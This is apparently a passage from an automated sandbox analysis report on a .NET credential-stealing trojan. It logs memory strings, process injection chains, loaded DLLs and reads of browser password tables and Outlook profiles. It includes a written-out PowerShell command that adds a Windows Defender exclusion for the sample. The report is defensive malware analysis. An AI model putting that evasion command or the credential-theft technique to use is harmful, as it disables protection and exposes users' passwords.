                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047BFDC08_2_047BFDC0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04851D5A8_2_04851D5A
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04857D738_2_04857D73
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A9EB08_2_047A9EB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485FFB18_2_0485FFB1
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485FF098_2_0485FF09
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04763FD58_2_04763FD5
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04763FD28_2_04763FD2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A1F928_2_047A1F92
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0480D8008_2_0480D800
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A38E08_2_047A38E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A99508_2_047A9950
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047BB9508_2_047BB950
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048359108_2_04835910
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04841AA38_2_04841AA3
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0483DAAC8_2_0483DAAC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0484DAC68_2_0484DAC6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04857A468_2_04857A46
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485FA498_2_0485FA49
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047E5AA08_2_047E5AA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04813A6C8_2_04813A6C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04815BF08_2_04815BF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047DDBF98_2_047DDBF9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485FB768_2_0485FB76
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047BFB808_2_047BFB80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_028120808_2_02812080
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0280CF608_2_0280CF60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0280B2A48_2_0280B2A4
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0280B2B08_2_0280B2B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0280D1808_2_0280D180
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0280B1608_2_0280B160
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_028157308_2_02815730
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_028139308_2_02813930
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0282BE108_2_0282BE10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466E6DC8_2_0466E6DC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466E2C88_2_0466E2C8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466E3E48_2_0466E3E4
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466D8488_2_0466D848
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466D8138_2_0466D813
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466CAE88_2_0466CAE8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0481F290 appears 105 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 047E7E54 appears 111 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0478B970 appears 280 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 047D5130 appears 58 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0480EA12 appears 86 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0587B970 appears 280 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 058D7E54 appears 102 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 058C5130 appears 58 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0590F290 appears 105 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 058FEA12 appears 86 times
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2055685556.00000000010EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2071119201.0000000007270000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq,\\StringFileInfo\\040904B0\\OriginalFilename vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBCYJ.exe> vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq,\\StringFileInfo\\000004B0\\OriginalFilename vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000000.2006793536.0000000000922000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBCYJ.exe> vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2070385799.0000000005670000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exeBinary or memory string: OriginalFilenameBCYJ.exe> vs W3MzrFzSF0.exe
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, PPUKR5wZS9CW8kiXFb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, PPUKR5wZS9CW8kiXFb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, z2xNW56F1ZH2jZTKon.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@16/13
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\W3MzrFzSF0.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgmfjlij.vsl.ps1Jump to behavior
                      Source: W3MzrFzSF0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000296B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2367362656.000000000296B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4466952395.000000000299C000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2369580085.0000000002977000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2367275248.0000000002948000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: W3MzrFzSF0.exeReversingLabs: Detection: 42%
                      Source: W3MzrFzSF0.exeVirustotal: Detection: 37%
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeFile read: C:\Users\user\Desktop\W3MzrFzSF0.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\W3MzrFzSF0.exe "C:\Users\user\Desktop\W3MzrFzSF0.exe"
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: pcaui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wer.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
